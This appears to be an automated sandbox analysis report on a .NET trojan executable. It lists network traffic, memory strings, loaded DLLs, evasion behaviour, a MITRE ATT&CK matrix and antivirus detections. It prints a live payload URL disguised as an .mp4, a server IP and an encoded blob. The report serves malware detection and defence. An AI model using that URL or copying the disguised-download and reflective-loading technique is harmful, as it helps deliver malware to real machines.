Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002753000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002659000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002666000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025DA000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002984000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000299D000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000259B000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000263F000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002780000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000268D000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027C5000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029E6000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002955000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alternatifplastik.com/dixa/Dquqrwaot.mp4X
Source: OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029E6000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A26000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alternatifplastik.comD
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.2.84.236:443 -> 192.168.2.11:49761 version: TLS 1.2
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeCode function: 0_2_00AD33E00_2_00AD33E0
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeCode function: 0_2_00AD484B0_2_00AD484B
Source: OfQ4QRmP65.exe, 00000000.00000002.2959171344.00000000005EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs OfQ4QRmP65.exe
Source: OfQ4QRmP65.exe, 00000000.00000000.1105905134.00000000001AC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePgxqwjdryfu.exe8 vs OfQ4QRmP65.exe
Source: OfQ4QRmP65.exeBinary or memory string: OriginalFilenamePgxqwjdryfu.exe8 vs OfQ4QRmP65.exe
Source: OfQ4QRmP65.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: OfQ4QRmP65.exe, -.csBase64 encoded string: 'TNjiuQEtMfP0qwglfNX4ogpuXtLiqAkic9iqigE0Ws/lvx0BbNL0oAYsZpr2qBAfWdT9oSohcsSqohQfVs/0vBEhc8jltF8netXOgQEueNX59iMla/XovQEGbc78hQUue8309gMla/7frAklJOj/qQE4UMeqnwEhe/Llvw0ueJrQqQB7eMTlkjQvbMjlpAsuJMb0uTsDatPjqAo0W878rA0uJPL0uSAha8Cq9FF1LZrQvhclcsP9tDclbdf0v18TdszhoQEBbNL0oAYsZuTpvQgvbcTj9gYhfcT9uwl7bMz+pgE0etLl'
Source: classification engineClassification label: mal64.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeMutant created: NULL
Source: OfQ4QRmP65.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OfQ4QRmP65.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: OfQ4QRmP65.exeVirustotal: Detection: 68%
Source: OfQ4QRmP65.exeReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
Source: OfQ4QRmP65.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: OfQ4QRmP65.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: OfQ4QRmP65.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: OfQ4QRmP65.exe, Mbvquz.cs.Net Code: Bpwfoz System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeMemory allocated: AD0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeWindow / User API: threadDelayed 4600Jump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeWindow / User API: threadDelayed 5301Jump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exe TID: 6184Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exe TID: 6184Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exe TID: 6276Thread sleep count: 4600 > 30Jump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exe TID: 6252Thread sleep count: 5301 > 30Jump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeThread delayed: delay time: 100000Jump to behavior
Source: OfQ4QRmP65.exe, 00000000.00000002.2959171344.000000000067C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeQueries volume information: C:\Users\user\Desktop\OfQ4QRmP65.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\OfQ4QRmP65.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Software Packing
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
OfQ4QRmP65.exe68%VirustotalBrowse
OfQ4QRmP65.exe74%ReversingLabsWin32.Trojan.Mardom
OfQ4QRmP65.exe100%AviraTR/AVI.Agent.xzleg
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.alternatifplastik.com0%Avira URL Cloudsafe
http://alternatifplastik.comd0%Avira URL Cloudsafe
http://alternatifplastik.com0%Avira URL Cloudsafe
https://www.alternatifplastik.com/dixa/Dquqrwaot.mp4X0%Avira URL Cloudsafe
https://www.alternatifplastik.com/dixa/Dquqrwa0%Avira URL Cloudsafe
https://www.alternatifplastik.com/dixa/Dquqrwaot.mp40%Avira URL Cloudsafe
http://www.alternatifplastik.comd0%Avira URL Cloudsafe
https://www.alternatifplastik.comD0%Avira URL Cloudsafe
http://www.alternatifplastik.com0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
alternatifplastik.com
5.2.84.236
truefalse
    unknown
    www.alternatifplastik.com
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://www.alternatifplastik.com/dixa/Dquqrwaot.mp4false
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
